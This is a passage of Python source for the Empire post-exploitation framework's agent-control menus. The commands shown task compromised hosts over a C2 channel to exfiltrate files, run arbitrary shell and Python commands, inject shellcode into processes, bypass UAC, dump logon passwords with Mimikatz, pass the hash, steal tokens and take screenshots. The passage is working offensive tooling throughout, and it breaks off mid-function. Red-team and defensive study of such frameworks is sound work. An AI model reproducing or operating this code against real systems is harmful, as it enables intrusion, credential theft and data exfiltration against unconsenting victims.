signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
def do_download(self, line):
"Task an agent to download a file into the C2."
line = line.strip()
if line != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DOWNLOAD", line)
# dispatch this event
message = "[*] Tasked agent to download {}".format(line)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to download " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_upload(self, line):
"Task the C2 to upload a file into an agent."
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
# absolute paths accepted
parts = line.strip().split(' ')
uploadname = ""
if len(parts) > 0 and parts[0] != "":
if len(parts) == 1:
# if we're uploading the file with its original name
uploadname = os.path.basename(parts[0])
else:
# if we're uploading the file as a different name
uploadname = parts[1].strip()
if parts[0] != "" and os.path.exists(parts[0]):
# Check the file size against the upload limit of 1 mb
# read in the file and base64 encode it for transport
open_file = open(parts[0], 'rb')
file_data = open_file.read()
open_file.close()
size = os.path.getsize(parts[0])
if size > 1048576:
print(helpers.color("[!] File size is too large. Upload limit is 1MB."))
else:
# dispatch this event
message = "[*] Tasked agent to upload {}, {}".format(uploadname, helpers.get_file_size(file_data))
file_data = file_data
signal = json.dumps({
'print': True,
'message': message,
'file_name': uploadname,
'file_md5': hashlib.md5(file_data).hexdigest(),
'file_size': helpers.get_file_size(file_data)
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to upload %s : %s" % (parts[0], hashlib.md5(file_data).hexdigest())
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# upload packets -> "filename | script data"
file_data = helpers.encode_base64(file_data)
data = uploadname + "|" + file_data.decode("latin-1")
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPLOAD", data)
else:
print(helpers.color("[!] Please enter a valid file path to upload"))
def do_scriptimport(self, line):
"Imports a PowerShell script and keeps it in memory in the agent."
path = line.strip()
if path != "" and os.path.exists(path):
open_file = open(path, 'r')
script_data = open_file.read()
open_file.close()
# strip out comments and blank lines from the imported script
script_data = helpers.strip_powershell_comments(script_data)
# task the agent to important the script
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_IMPORT", script_data)
# dispatch this event
message = "[*] Tasked agent to import {}: {}".format(path,
hashlib.md5(script_data.encode('utf-8')).hexdigest())
signal = json.dumps({
'print': False,
'message': message,
'import_path': path,
'import_md5': hashlib.md5(script_data.encode('utf-8')).hexdigest()
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log with the filename and MD5
msg = "Tasked agent to import %s : %s" % (path, hashlib.md5(script_data.encode('utf-8')).hexdigest())
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
# extract the functions from the script so we can tab-complete them
functions = helpers.parse_powershell_script(script_data)
# set this agent's tab-completable functions
self.mainMenu.agents.set_agent_functions_db(self.sessionID, functions)
else:
print(helpers.color("[!] Please enter a valid script path"))
def do_scriptcmd(self, line):
"Execute a function in the currently imported PowerShell script."
command = line.strip()
if command != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", command)
# dispatch this event
message = "[*] Tasked agent {} to run {}".format(self.sessionID, command)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
msg = "[*] Tasked agent %s to run %s" % (self.sessionID, command)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_usemodule(self, line):
"Use an Empire PowerShell module."
# Strip asterisks added by MainMenu.complete_usemodule()
module = "powershell/%s" % (line.strip().rstrip("*"))
if module not in self.mainMenu.modules.modules:
print(helpers.color("[!] Error: invalid module"))
else:
module_menu = ModuleMenu(self.mainMenu, module, agent=self.sessionID)
module_menu.cmdloop()
def do_searchmodule(self, line):
"Search Empire module names/descriptions."
search_term = line.strip()
if search_term.strip() == "":
print(helpers.color("[!] Please enter a search term."))
else:
self.mainMenu.modules.search_modules(search_term)
def do_updateprofile(self, line):
"Update an agent connection profile."
# profile format:
# TaskURI1,TaskURI2,...|UserAgent|OptionalHeader1,OptionalHeader2...
profile = line.strip().strip()
if profile != "":
# load up a profile from a file if a path was passed
if os.path.exists(profile):
open_file = open(profile, 'r')
profile = open_file.readlines()
open_file.close()
# strip out profile comments and blank lines
profile = [l for l in profile if not l.startswith("#" and l.strip() != "")]
profile = profile[0]
if not profile.strip().startswith("\"/"):
print(helpers.color("[!] Task URIs in profiles must start with / and be enclosed in quotes!"))
else:
updatecmd = "Update-Profile " + profile
# task the agent to update their profile
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", updatecmd)
# dispatch this event
message = "[*] Tasked agent to update profile {}".format(profile)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to update profile " + profile
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color(
"[*] Profile format is \"TaskURI1,TaskURI2,...|UserAgent|OptionalHeader2:Val1|OptionalHeader2:Val2...\""))
def do_updatecomms(self, line):
"Dynamically update the agent comms to another listener"
# generate comms for the listener selected
if line:
listenerID = line.strip()
if not self.mainMenu.listeners.is_listener_valid(listenerID):
print(helpers.color("[!] Please enter a valid listenername."))
else:
activeListener = self.mainMenu.listeners.activeListeners[listenerID]
if activeListener['moduleName'] != 'meterpreter' or activeListener['moduleName'] != 'http_mapi':
listenerOptions = activeListener['options']
listenerComms = self.mainMenu.listeners.loadedListeners[
activeListener['moduleName']].generate_comms(listenerOptions, language="powershell")
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_UPDATE_LISTENERNAME",
listenerOptions['Name']['Value'])
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SWITCH_LISTENER", listenerComms)
msg = "Tasked agent to update comms to %s listener" % listenerID
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color(
"[!] Ineligible listener for updatecomms command: %s" % activeListener['moduleName']))
else:
print(helpers.color("[!] Please enter a valid listenername."))
def do_psinject(self, line):
"Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>"
# get the info for the psinject module
if line:
if self.mainMenu.modules.modules['powershell/management/psinject']:
module = self.mainMenu.modules.modules['powershell/management/psinject']
listenerID = line.split(' ')[0].strip()
module.options['Listener']['Value'] = listenerID
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
if len(line.split(' ')) == 2:
target = line.split(' ')[1].strip()
if target.isdigit():
module.options['ProcId']['Value'] = target
module.options['ProcName']['Value'] = ''
else:
module.options['ProcName']['Value'] = target
module.options['ProcId']['Value'] = ''
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'powershell/management/psinject')
module_menu.do_execute("")
else:
print(helpers.color("[!] Please enter <listenerName> <pid>"))
else:
print(helpers.color("[!] powershell/management/psinject module not loaded"))
else:
print(helpers.color("[!] Injection requires you to specify listener"))
def do_shinject(self, line):
"Inject non-meterpreter listener shellcode into a remote process. Ex. shinject <listener> <pid>"
if line:
if self.mainMenu.modules.modules['powershell/management/shinject']:
module = self.mainMenu.modules.modules['powershell/management/shinject']
listenerID = line.split(' ')[0]
arch = line.split(' ')[-1]
module.options['Listener']['Value'] = listenerID
module.options['Arch']['Value'] = arch
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
if len(line.split(' ')) == 3:
target = line.split(' ')[1].strip()
if target.isdigit():
module.options['ProcId']['Value'] = target
else:
print(helpers.color('[!] Please enter a valid process ID.'))
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module_menu = ModuleMenu(self.mainMenu, 'powershell/management/shinject')
module_menu.do_execute("")
else:
print(helpers.color('[!] Please select a valid listener'))
else:
print(helpers.color("[!] powershell/management/psinject module not loaded"))
else:
print(helpers.color("[!] Injection requires you to specify listener"))
def do_injectshellcode(self, line):
"Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>"
# get the info for the inject module
if line:
listenerID = line.split(' ')[0].strip()
pid = ''
if len(line.split(' ')) == 2:
pid = line.split(' ')[1].strip()
if self.mainMenu.modules.modules['powershell/code_execution/invoke_shellcode']:
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
module = self.mainMenu.modules.modules['powershell/code_execution/invoke_shellcode']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
if pid != '':
module.options['ProcessID']['Value'] = pid
module_menu = ModuleMenu(self.mainMenu, 'powershell/code_execution/invoke_shellcode')
module_menu.cmdloop()
else:
print(helpers.color("[!] Please enter <listenerName> <pid>"))
else:
print(helpers.color("[!] powershell/code_execution/invoke_shellcode module not loaded"))
else:
print(helpers.color("[!] Injection requires you to specify listener"))
def do_sc(self, line):
"Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]"
# get the info for the psinject module
if len(line.strip()) > 0:
# JPEG compression ratio
try:
screenshot_ratio = str(int(line.strip()))
except Exception:
print(helpers.color("[*] JPEG Ratio incorrect. Has been set to 80."))
screenshot_ratio = "80"
else:
screenshot_ratio = ''
if self.mainMenu.modules.modules['powershell/collection/screenshot']:
module = self.mainMenu.modules.modules['powershell/collection/screenshot']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
module.options['Ratio']['Value'] = screenshot_ratio
# execute the screenshot module
module_menu = ModuleMenu(self.mainMenu, 'powershell/collection/screenshot')
module_menu.do_execute("")
else:
print(helpers.color("[!] powershell/collection/screenshot module not loaded"))
def do_spawn(self, line):
"Spawns a new Empire agent for the given listener name. Ex. spawn <listener>"
# get the info for the spawn module
if line:
listenerID = line.split(' ')[0].strip()
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
# ensure the inject module is loaded
if self.mainMenu.modules.modules['powershell/management/spawn']:
module = self.mainMenu.modules.modules['powershell/management/spawn']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# jump to the spawn module
module_menu = ModuleMenu(self.mainMenu, "powershell/management/spawn")
module_menu.cmdloop()
else:
print(helpers.color("[!] management/spawn module not loaded"))
else:
print(helpers.color("[!] Please enter a valid listener name or ID."))
else:
print(helpers.color("[!] Please specify a listener name or ID."))
def do_bypassuac(self, line):
"Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>"
# get the info for the bypassuac module
if line:
listenerID = line.split(' ')[0].strip()
if listenerID != '' and self.mainMenu.listeners.is_listener_valid(listenerID):
# ensure the inject module is loaded
if self.mainMenu.modules.modules['powershell/privesc/bypassuac_eventvwr']:
module = self.mainMenu.modules.modules['powershell/privesc/bypassuac_eventvwr']
module.options['Listener']['Value'] = listenerID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# jump to the spawn module
module_menu = ModuleMenu(self.mainMenu, 'powershell/privesc/bypassuac_eventvwr')
module_menu.do_execute('')
else:
print(helpers.color("[!] powershell/privesc/bypassuac_eventvwr module not loaded"))
else:
print(helpers.color("[!] Please enter a valid listener name or ID."))
else:
print(helpers.color("[!] Please specify a listener name or ID."))
def do_mimikatz(self, line):
"Runs Invoke-Mimikatz on the client."
# ensure the credentials/mimiktaz/logonpasswords module is loaded
if self.mainMenu.modules.modules['powershell/credentials/mimikatz/logonpasswords']:
module = self.mainMenu.modules.modules['powershell/credentials/mimikatz/logonpasswords']
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the Mimikatz module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/mimikatz/logonpasswords')
module_menu.do_execute('')
def do_pth(self, line):
"Executes PTH for a CredID through Mimikatz."
credID = line.strip()
if credID == '':
print(helpers.color("[!] Please specify a <CredID>."))
return
if self.mainMenu.modules.modules['powershell/credentials/mimikatz/pth']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/mimikatz/pth')
module = self.mainMenu.modules.modules['powershell/credentials/mimikatz/pth']
# set mimikt/pth to use the given CredID
module.options['CredID']['Value'] = credID
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the mimikatz/pth module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/mimikatz/pth')
module_menu.do_execute('')
def do_steal_token(self, line):
"Uses credentials/tokens to impersonate a token for a given process ID."
processID = line.strip()
if processID == '':
print(helpers.color("[!] Please specify a process ID."))
return
if self.mainMenu.modules.modules['powershell/credentials/tokens']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/tokens')
module = self.mainMenu.modules.modules['powershell/credentials/tokens']
# set credentials/token to impersonate the given process ID token
module.options['ImpersonateUser']['Value'] = 'True'
module.options['ProcessID']['Value'] = processID
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the token module
module_menu = ModuleMenu(self.mainMenu, 'powershell/credentials/tokens')
module_menu.do_execute('')
# run a sysinfo to update
self.do_sysinfo(line)
def do_revtoself(self, line):
"Uses credentials/tokens to revert token privileges."
if self.mainMenu.modules.modules['powershell/credentials/tokens']:
# reload the module to reset the default values
module = self.mainMenu.modules.reload_module('powershell/credentials/tokens')
module = self.mainMenu.modules.modules['powershell/credentials/tokens']
# set credentials/token to revert to self
module.options['RevToSelf']['Value'] = "True"
# set the agent ID
module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# execute the token module
module_menu = ModuleMenu(self.mainMenu, "powershell/credentials/tokens")
module_menu.do_execute('')
# run a sysinfo to update
self.do_sysinfo(line)
def do_creds(self, line):
"Display/return credentials from the database."
self.mainMenu.do_creds(line)
def complete_reflectiveload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
def complete_updatecomms(self, text, line, begidx, endidx):
"Tab-complete updatecomms option values"
return self.complete_psinject(text, line, begidx, endidx)
def complete_shinject(self, text, line, begidx, endidx):
"Tab-complete psinject option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_psinject(self, text, line, begidx, endidx):
"Tab-complete psinject option values."
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in self.mainMenu.listeners.get_listener_names() if s.startswith(mline)]
def complete_injectshellcode(self, text, line, begidx, endidx):
"Tab-complete injectshellcode option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_spawn(self, text, line, begidx, endidx):
"Tab-complete spawn option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_bypassuac(self, text, line, begidx, endidx):
"Tab-complete bypassuac option values."
return self.complete_psinject(text, line, begidx, endidx)
def complete_jobs(self, text, line, begidx, endidx):
"Tab-complete jobs management options."
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in ["kill"] if s.startswith(mline)]
def complete_scriptimport(self, text, line, begidx, endidx):
"Tab-complete a PowerShell script path"
return helpers.complete_path(text, line)
def complete_scriptcmd(self, text, line, begidx, endidx):
"Tab-complete a script cmd set."
functions = self.mainMenu.agents.get_agent_functions(self.sessionID)
mline = line.partition(' ')[2]
offs = len(mline) - len(text)
return [s[offs:] for s in functions if s.startswith(mline)]
def complete_usemodule(self, text, line, begidx, endidx):
"Tab-complete an Empire PowerShell module path"
return self.mainMenu.complete_usemodule(text, line, begidx, endidx, language='powershell')
def complete_upload(self, text, line, begidx, endidx):
"Tab-complete an upload file path"
return helpers.complete_path(text, line)
def complete_updateprofile(self, text, line, begidx, endidx):
"Tab-complete an updateprofile path"
return helpers.complete_path(text, line)
def complete_creds(self, text, line, begidx, endidx):
"Tab-complete 'creds' commands."
return self.mainMenu.complete_creds(text, line, begidx, endidx)
class PythonAgentMenu(SubMenu):
def __init__(self, mainMenu, sessionID):
SubMenu.__init__(self, mainMenu)
self.sessionID = sessionID
self.doc_header = 'Agent Commands'
dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# try to resolve the sessionID to a name
name = self.mainMenu.agents.get_agent_name_db(sessionID)
# set the text prompt
self.prompt = '(Empire: ' + helpers.color(name, 'red') + ') > '
# listen for messages from this specific agent
# dispatcher.connect(self.handle_agent_event, sender=dispatcher.Any)
# agent commands that have opsec-safe alises in the agent code
self.agentCommands = ['ls', 'rm', 'pwd', 'mkdir', 'whoami', 'getuid', 'hostname']
# display any results from the database that were stored
# while we weren't interacting with the agent
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + results.rstrip('\r\n'))
def handle_agent_event(self, signal, sender):
"""
Handle agent event signals
"""
# load up the signal so we can inspect it
try:
signal_data = json.loads(signal)
except ValueError:
print(helpers.color("[!] Error: bad signal recieved {} from sender {}".format(signal, sender)))
return
if '{} returned results'.format(self.sessionID) in signal:
results = self.mainMenu.agents.get_agent_results_db(self.sessionID)
if results:
print("\n" + helpers.color(results))
def default(self, line):
"Default handler"
line = line.strip()
parts = line.split(' ')
if len(parts) > 0:
# check if we got an agent command
if parts[0] in self.agentCommands:
shellcmd = ' '.join(parts)
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", shellcmd)
# dispatch this event
message = "[*] Tasked agent to run command {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run command " + line
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color("[!] Command not recognized."))
print(helpers.color("[*] Use 'help' or 'help agentcmds' to see available commands."))
def do_dirlist(self, line):
"Tasks an agent to store the contents of a directory in the database."
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DIR_LIST", line)
def do_help(self, *args):
"Displays the help menu or syntax for particular commands."
SubMenu.do_help(self, *args)
def do_list(self, line):
"Lists all active agents (or listeners)."
if line.lower().startswith("listeners"):
self.mainMenu.do_list("listeners " + str(' '.join(line.split(' ')[1:])))
elif line.lower().startswith("agents"):
self.mainMenu.do_list("agents " + str(' '.join(line.split(' ')[1:])))
else:
print(helpers.color("[!] Please use 'list [agents/listeners] <modifier>'."))
def do_rename(self, line):
"Rename the agent."
parts = line.strip().split(' ')
oldname = self.mainMenu.agents.get_agent_name_db(self.sessionID)
# name sure we get a new name to rename this agent
if len(parts) == 1 and parts[0].strip() != '':
# replace the old name with the new name
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
if result:
self.prompt = "(Empire: " + helpers.color(parts[0], 'red') + ") > "
else:
print(helpers.color("[!] Please enter a new name for the agent"))
def do_info(self, line):
"Display information about this agent"
# get the agent name, if applicable
agent = self.mainMenu.agents.get_agent_db(self.sessionID)
messages.display_agent(agent)
def do_exit(self, line):
"Task agent to exit."
try:
choice = input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
if choice.lower() == "y":
self.mainMenu.agents.add_agent_task_db(self.sessionID, 'TASK_EXIT')
# dispatch this event
message = "[*] Tasked agent to exit"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
raise NavAgents
except KeyboardInterrupt as e:
print("")
def do_clear(self, line):
"Clear out agent tasking."
self.mainMenu.agents.clear_agent_tasks_db(self.sessionID)
def do_cd(self, line):
"Change an agent's active directory"
line = line.strip()
if line != "":
# have to be careful with inline python and no threading
# this can cause the agent to crash so we will use try / cath
# task the agent with this shell command
if line == "..":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
'import os; os.chdir(os.pardir); print("Directory stepped down: %s")' % (
line))
else:
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
'import os; os.chdir("%s"); print("Directory changed to: %s)"' % (
line, line))
# dispatch this event
message = "[*] Tasked agent to change active directory to {}".format(line)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to change active directory to: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_jobs(self, line):
"Return jobs or kill a running job."
parts = line.split(' ')
if len(parts) == 1:
if parts[0] == '':
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_GETJOBS")
# dispatch this event
message = "[*] Tasked agent to get running jobs"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
else:
print(helpers.color("[!] Please use form 'jobs kill JOB_ID'"))
elif len(parts) == 2:
jobID = parts[1].strip()
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_STOPJOB", jobID)
# dispatch this event
message = "[*] Tasked agent to get stop job {}".format(jobID)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
def do_sleep(self, line):
"Task an agent to 'sleep interval [jitter]'"
parts = line.strip().split(' ')
delay = parts[0]
# make sure we pass a int()
if len(parts) >= 1:
try:
int(delay)
except:
print(helpers.color("[!] Please only enter integer for 'interval'"))
return
if len(parts) > 1:
try:
int(parts[1])
except:
print(helpers.color("[!] Please only enter integer for '[jitter]'"))
return
if delay == "":
# task the agent to display the delay/jitter
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global delay; global jitter; print('delay/jitter = ' + str(delay)+'/'+str(jitter))")
# dispatch this event
message = "[*] Tasked agent to display delay/jitter"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display delay/jitter")
elif len(parts) > 0 and parts[0] != "":
delay = parts[0]
jitter = 0.0
if len(parts) == 2:
jitter = parts[1]
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("delay", delay, self.sessionID)
self.mainMenu.agents.set_agent_field_db("jitter", jitter, self.sessionID)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global delay; global jitter; delay=%s; jitter=%s; print('delay/jitter set to %s/%s')" % (
delay, jitter, delay, jitter))
# dispatch this event
message = "[*] Tasked agent to delay sleep/jitter {}/{}".format(delay, jitter)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_lostlimit(self, line):
"Task an agent to display change the limit on lost agent detection"
parts = line.strip().split(' ')
lostLimit = parts[0]
if lostLimit == "":
# task the agent to display the lostLimit
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global lostLimit; print('lostLimit = ' + str(lostLimit))")
# dispatch this event
message = "[*] Tasked agent to display lost limit"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display lost limit")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("lost_limit", lostLimit, self.sessionID)
# task the agent with the new lostLimit
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global lostLimit; lostLimit=%s; print('lostLimit set to %s')" % (
lostLimit, lostLimit))
# dispatch this event
message = "[*] Tasked agent to change lost limit {}".format(lostLimit)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to change lost limit " + str(lostLimit)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_killdate(self, line):
"Get or set an agent's killdate (01/01/2016)."
parts = line.strip().split(' ')
killDate = parts[0]
if killDate == "":
# task the agent to display the killdate
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global killDate; print('killDate = ' + str(killDate))")
# dispatch this event
message = "[*] Tasked agent to display killDate"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to display killDate")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("kill_date", killDate, self.sessionID)
# task the agent with the new killDate
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global killDate; killDate='%s'; print('killDate set to %s')" % (
killDate, killDate))
# dispatch this event
message = "[*] Tasked agent to set killDate to {}".format(killDate)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set killdate to %s" % (killDate)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_workinghours(self, line):
"Get or set an agent's working hours (9:00-17:00)."
parts = line.strip().split(' ')
hours = parts[0]
if hours == "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global workingHours; print('workingHours = ' + str(workingHours))")
# dispatch this event
message = "[*] Tasked agent to get working hours"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
else:
# update this agent's information in the database
self.mainMenu.agents.set_agent_field_db("working_hours", hours, self.sessionID)
# task the agent with the new working hours
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT",
"global workingHours; workingHours= '%s'" % (hours))
# dispatch this event
message = "[*] Tasked agent to set working hours to {}".format(hours)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to set working hours to: %s" % (hours)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_shell(self, line):
"Task an agent to use a shell command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SHELL", str(line))
# dispatch this event
message = "[*] Tasked agent to run shell command: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run shell command: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_python(self, line):
"Task an agent to run a Python command."
line = line.strip()
if line != "":
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", str(line))
# dispatch this event
message = "[*] Tasked agent to run Python command: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'command': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to run Python command: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_pythonscript(self, line):
"Load and execute a python script"
path = line.strip()
if os.path.splitext(path)[-1] == '.py' and os.path.isfile(path):
filename = os.path.basename(path).rstrip('.py')
open_file = open(path, 'r')
script = open_file.read()
open_file.close()
script = script.replace('\r\n', '\n')
script = script.replace('\r', '\n')
encScript = base64.b64encode(script)
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript)
# dispatch this event
message = "[*] Tasked agent to execute Python script: {}".format(filename)
signal = json.dumps({
'print': True,
'message': message,
'script_name': filename,
# note md5 is after replacements done on \r and \r\n above
'script_md5': hashlib.md5(script).hexdigest()
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "[*] Tasked agent to execute python script: " + filename
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
else:
print(helpers.color("[!] Please provide a valid path", color="red"))
def do_sysinfo(self, line):
"Task an agent to get system information."
# task the agent with this shell command
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SYSINFO")
# dispatch this event
message = "[*] Tasked agent to get system information"
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
def do_download(self, line):
"Task an agent to download a file into the C2."
line = line.strip()
if line != "":
self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_DOWNLOAD", line)
# dispatch this event
message = "[*] Tasked agent to download: {}".format(line)
signal = json.dumps({
'print': False,
'message': message,
'download_filename': line
})
dispatcher.send(signal, sender="agents/{}".format(self.sessionID))
# update the agent log
msg = "Tasked agent to download: %s" % (line)
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
def do_upload(self, line):
"Task the C2 to upload a file into an agent."
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
# absolute paths accepted
parts = line.strip().split(' ')
uploadname = ""
if len(parts) > 0 and parts[0] != "":
if len(parts) == 1:
# if we're uploading the file with its original name
uploadname = os.path.basename(parts[0])
else:
# if we're uploading the file as a different name
uploadname = parts[1].strip()
if parts[0] != "" and os.path.exists(parts[0]):
# TODO: reimplement Python file upload
# # read in the file and base64 encode it for transport
f = open(parts[0], 'rb')
fileData = f.read()
f.close()
# Get file size
size = os.path.getsize(parts[0])
if size > 1048576:
print(helpers.color("[!] File size is too large. Upload limit is 1MB."))
else:
